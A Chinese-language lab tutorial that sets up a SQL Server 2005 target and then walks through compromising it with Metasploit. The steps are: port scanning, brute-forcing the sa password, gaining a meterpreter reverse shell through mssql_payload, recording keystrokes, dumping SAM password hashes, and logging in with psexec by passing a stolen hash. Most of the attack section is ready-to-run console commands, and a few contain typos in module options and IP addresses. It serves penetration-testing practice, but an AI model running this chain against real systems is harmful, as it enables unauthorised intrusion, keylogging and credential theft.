目录
- 一、SQL Server 2005数据库的搭建
- 二、渗透攻击
- 三、总结
一、SQL Server 2005数据库的搭建
(1)、SQL Server 2005 专业版下载地址:
注:SQL Server 2005 专业版分为两个光盘(1、2),两个光盘都安装才是完整版SQL Server 2005 专业版。
CD1:ed2k://|file|cs_sql_2005_std_x86_cd1.iso|441892864|CAABF976F9B4591007B6157814661988|/
CD2:ed2k://|file|cs_sql_2005_std_x86_cd2.iso|635772928|BA2AEEF53DC9F3CCD55F27220446708B|/
(2)、将服务器组件、工具、联机丛书和示例©,运行 SQL Native Client 安装向导(U)依次安装:
(3)、若出现Microsoft Windows Installer 3.1未安装,则需要先安装才能继续安装数据库
Microsoft Windows Installer 3.1下载地址:
http://d.wenjian.net/exe/windowsxp-kb942288-v3-x86.rar
(4)、SQL Server 2005 数据库的连接账号及密码:
(5)、打开远程连接:
(6)、登录数据库:
二、渗透攻击
(1)、用nmap扫描172.16.12.101,探测器其主机端口开放情况:
nmap -sT -p0 172.16.12.101
(2)、获取信息有关于172.16.12.101的SQL Server 2005的信息:
search mssql_ping
use 0
set rhosts 172.16.12.101
set threads 50
exploit
(3)、选择密码遍历模块对SQL Server 2005的sa密码进行猜解:
search mssql_login
use 0
set rhosts 172.6.12.101
set threads 50
set username sa
set verbose false
set pass_life /usr/share/wordlists/dirb/big.txt
exploit
(4)、选择攻击模块对靶机进行攻击:
set mssql_payload
use 0
set payload windows/meterpreter/reverse_tcp
set rhosts 172.16.12.101
set lport 443
set password 123@
set method old
exploit
注:在windows xp 中互交行应该选择老模式
(5)、对靶机进行截屏:
(6)、打开shll查看:
(7)、启动键盘记录:
sysinfo
sp
migrate 1904
run post/windows/capture/keylog_recorder
注:migrate 1904 执行migrate 1904命令将会话迁移至explorer.exe的进程空间中,
之后启动keylog_.recorder模块。一段时间后使用CTRL-C中止,最后,在另一个终端里,
可以看到我们使用键盘记录所捕捉到的内容。
(8)、在靶机输入任意内容,在kali打开root权限shll输入查看键盘记录保存的文件路径进行:
⭐如果获取的是systeam权限(getuid查看),用systeam权限可以获取windows的sam文件内的各个账户的密码(密码已被hash方法加密),然后使用模块无密码登录,以下是三种获取密码hash值得方法:
(1)、在meterpre输入:使用ps命令获得了包括explorer.exe在内的进程列表。我们使用migrate命令将会话迁移至explorer.exe的进程空间中,之后使用hashdump命令获取被攻击电脑的电脑账户和被hash方法加密的电脑密码:
ps
migrate 2924
hashdump
(2)、在meterpre输入:run post/windows/gather/hashdump:
(3)、在获取systeam权限后,用background命令将meterpreter挂在后台,运行post/windows/gather/hashdump模块:
background
use post/windows/gather/hashdump
show options
set session 7
run
(4)、 使用exploit/windows/smb/psexec 模块进行没密码远程登陆。(使用此方法必须关闭被攻击机器的防火墙,被攻击机器开启445端口,以及使用管理员账号连接)
search psexec
use 4
set rhosts 172.16.12.101
set rport 445
set SMBPASS 5f46d39d08e98f89aad3b435b51404ee:39b8c68ea9fb001e24cf470ee94382dc
set smbuser administrator
run
三、总结